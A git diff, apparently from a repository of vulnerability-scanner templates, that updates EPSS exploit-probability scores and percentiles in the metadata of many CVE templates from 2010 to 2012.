--git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 9632d9d5761..1211a37548c 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.02865 - epss-percentile: 0.85866 + epss-percentile: 0.85864 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index cb6000d3d2a..4f1e3e98bc5 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.01654 - epss-percentile: 0.81608 + epss-percentile: 0.81601 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index b82f93a97e9..2273cd97870 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.03413 - epss-percentile: 0.87094 + epss-percentile: 0.87093 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2018.yaml b/http/cves/2010/CVE-2010-2018.yaml index 600fb9c999e..160c04a287e 100644 --- a/http/cves/2010/CVE-2010-2018.yaml +++ b/http/cves/2010/CVE-2010-2018.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2018 epss-score: 0.00334 - epss-percentile: 0.55655 + epss-percentile: 0.55647 cwe-id: CWE-22 metadata: verified: true diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 9a2ba689957..121b70dfbcf 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.01378 - epss-percentile: 0.79865 + epss-percentile: 0.79856 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 41851f2a039..c1ebe2608f7 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.01646 - epss-percentile: 0.81556 + epss-percentile: 0.81547 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 30dbf6bd3c7..80f934872e1 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - epss-score: 0.01646 - epss-percentile: 0.81556 + epss-score: 0.0222 + epss-percentile: 0.84066 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index d47684464b3..78884ea636a 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.68809 + epss-percentile: 0.68797 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 3f6466c0e3d..168df05d088 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.01646 - epss-percentile: 0.81556 + epss-percentile: 0.81547 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index d37a249bf8d..f6841f47600 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.09628 - epss-percentile: 0.92649 + epss-percentile: 0.92643 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index a4a21bd7afe..856b96d1b13 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03017 - epss-percentile: 0.86224 + epss-percentile: 0.86226 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 4255b8d936b..370fa164339 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01818 - epss-percentile: 0.82417 + epss-percentile: 0.82415 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 6f9e69044bf..99bf3aaacb6 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.04029 - epss-percentile: 0.8816 + epss-percentile: 0.88162 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 4032920623d..e7383c4cfd6 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.0285 - epss-percentile: 0.85835 + epss-percentile: 0.85833 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 3ff8236e1a1..675c7e6d51c 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01923 - epss-percentile: 0.82923 + epss-percentile: 0.8292 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 8b778d2d9fe..66f0ec94767 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.0202 - epss-percentile: 0.83311 + epss-percentile: 0.83308 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 538ce11d471..f3ab85d5bd7 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00584 - epss-percentile: 0.6843 + epss-percentile: 0.68418 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 36bf3b64e17..9723778f909 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.0202 - epss-percentile: 0.83311 + epss-percentile: 0.83308 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 34164e12897..52fe252f3dc 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2861 cwe-id: CWE-22 epss-score: 0.94233 - epss-percentile: 0.99923 + epss-percentile: 0.99921 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 4460fc5477c..0d17cc68879 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.01604 - epss-percentile: 0.81308 + epss-percentile: 0.81299 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 39756a24a3e..21de872de61 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - epss-score: 0.01836 - epss-percentile: 0.82486 + epss-score: 0.03976 + epss-percentile: 0.88064 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index f4528aed2f7..7f7b3a0f2cd 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00555 - epss-percentile: 0.67521 + epss-percentile: 0.67509 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 6d862157f1f..6c5ccc7450d 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.0406 - epss-percentile: 0.88202 + epss-percentile: 0.88204 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 63685c5b8f7..6f8000d57ef 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.55795 - epss-percentile: 0.98007 + epss-percentile: 0.98005 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 165ac491e5d..c628e8f3bd5 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.0076 - epss-percentile: 0.72822 + epss-percentile: 0.72799 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index f7cf475aa1e..459e8e2449a 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.08213 - epss-percentile: 0.91954 + epss-percentile: 0.91951 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 84e553bfd72..4f6cd5fca36 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.01559 - epss-percentile: 0.81057 + epss-percentile: 0.81047 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 5e4c27f354d..1e632079ca5 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.05974 - epss-percentile: 0.90387 + epss-percentile: 0.90388 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 63fd40c33e1..53b8480f3b6 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.91269 - epss-percentile: 0.99633 + epss-percentile: 0.99632 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 76ec4b636b7..467eed02ceb 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.01195 - epss-percentile: 0.78443 + epss-percentile: 0.78439 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 302cb8783dd..79a1c595881 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01708 - epss-percentile: 0.81887 + epss-percentile: 0.81884 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-3600.yaml b/http/cves/2011/CVE-2011-3600.yaml index 5c1a7a045ff..c91a5a6a0ab 100644 --- a/http/cves/2011/CVE-2011-3600.yaml +++ b/http/cves/2011/CVE-2011-3600.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2011-3600 cwe-id: CWE-611 - epss-score: 0.37264 - epss-percentile: 0.97045 + epss-score: 0.50999 + epss-percentile: 0.97769 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index ea5d088aa9b..d659e22f5d4 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00927 - epss-percentile: 0.75583 + epss-percentile: 0.75574 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 88c7074d44a..9dfa84d7b42 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.04723 - epss-percentile: 0.89074 + epss-percentile: 0.8907 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 0d1dc00b1e8..2f3c25c1508 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.05988 - epss-percentile: 0.90396 + epss-percentile: 0.90397 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 6c5624498f1..bf220a53d56 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4640 cwe-id: CWE-22 epss-score: 0.12255 - epss-percentile: 0.93636 + epss-percentile: 0.93631 cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 92275c52b7e..c926701dd89 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - epss-score: 0.30722 - epss-percentile: 0.96577 + epss-score: 0.25531 + epss-percentile: 0.96057 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index f523c8cf121..329bf73a598 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.07833 - epss-percentile: 0.91722 + epss-percentile: 0.9172 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 52b4157dcba..02956e57849 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.02815 - epss-percentile: 0.85737 + epss-percentile: 0.85734 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 8837bd3fd5a..2b69754d906 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.02203 - epss-percentile: 0.84016 + epss-percentile: 0.84011 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 31f548747eb..8d2f171906a 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.02203 - epss-percentile: 0.84016 + epss-percentile: 0.84011 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 11554370e42..ef424879edb 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.01422 - epss-percentile: 0.8019 + epss-percentile: 0.80182 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index c6ea34500d1..f7ad44d2568 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.26961 - epss-percentile: 0.9621 + epss-percentile: 0.96212 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 7ae6e2d76fa..c50509f1223 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.03691 - epss-percentile: 0.87584 + epss-percentile: 0.87585 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 629caa284fa..a7fd6197fdb 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00693 - epss-percentile: 0.71353 + epss-percentile: 0.71329 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 860f9162ce5..45a5be40c3a 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - epss-score: 0.08793 - epss-percentile: 0.92272 + epss-score: 0.10061 + epss-percentile: 0.92851 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 4d85d4135c1..7dc3de8cbbe 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -20,8 +20,8 @@ info: cvss-score: 3.5 cve-id: CVE-2012-0991 cwe-id: CWE-22 - epss-score: 0.47271 - epss-percentile: 0.97593 + epss-score: 0.4071 + epss-percentile: 0.97245 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index a3acdb719a6..2c8e8cb71d1 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - epss-score: 0.03998 - epss-percentile: 0.88104 + epss-score: 0.06052 + epss-percentile: 0.9045 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-10018.yaml b/http/cves/2012/CVE-2012-10018.yaml index 602601e4495..2526ed7c1a7 100644 --- a/http/cves/2012/CVE-2012-10018.yaml +++ b/http/cves/2012/CVE-2012-10018.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.3 cve-id: CVE-2012-10018 cwe-id: CWE-79 - epss-score: 0.0305 - epss-percentile: 0.86295 + epss-score: 0.02517 + epss-percentile: 0.85003 cpe: cpe:2.3:a:mapplic:mapplic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index cd265061b66..9879b6b99fc 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - epss-score: 0.03441 - epss-percentile: 0.87146 + epss-score: 0.04625 + epss-percentile: 0.88951 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index eafe5bdb417..43867b10c2c 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-1823 cwe-id: CWE-20 epss-score: 0.94386 - epss-percentile: 0.99968 + epss-percentile: 0.99967 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 6fc0534aac5..c8ea337af5a 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00975 - epss-percentile: 0.76231 + epss-percentile: 0.76224 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 66856aba9d5..aecb04c0994 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.13504 - epss-percentile: 0.94003 + epss-percentile: 0.93998 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 852f7e5998f..ae8e2e1f9d8 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.08022 - epss-percentile: 0.91851 + epss-percentile: 0.91847 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 3d9b16f5497..8f8cdf4885c 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.01303 - epss-percentile: 0.79327 + epss-percentile: 0.79324 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 6afdd619c76..80375f1cc82 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.31657 - epss-percentile: 0.96652 + epss-percentile: 0.96654 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 60844a0b510..77976bdf54b 100644 --- 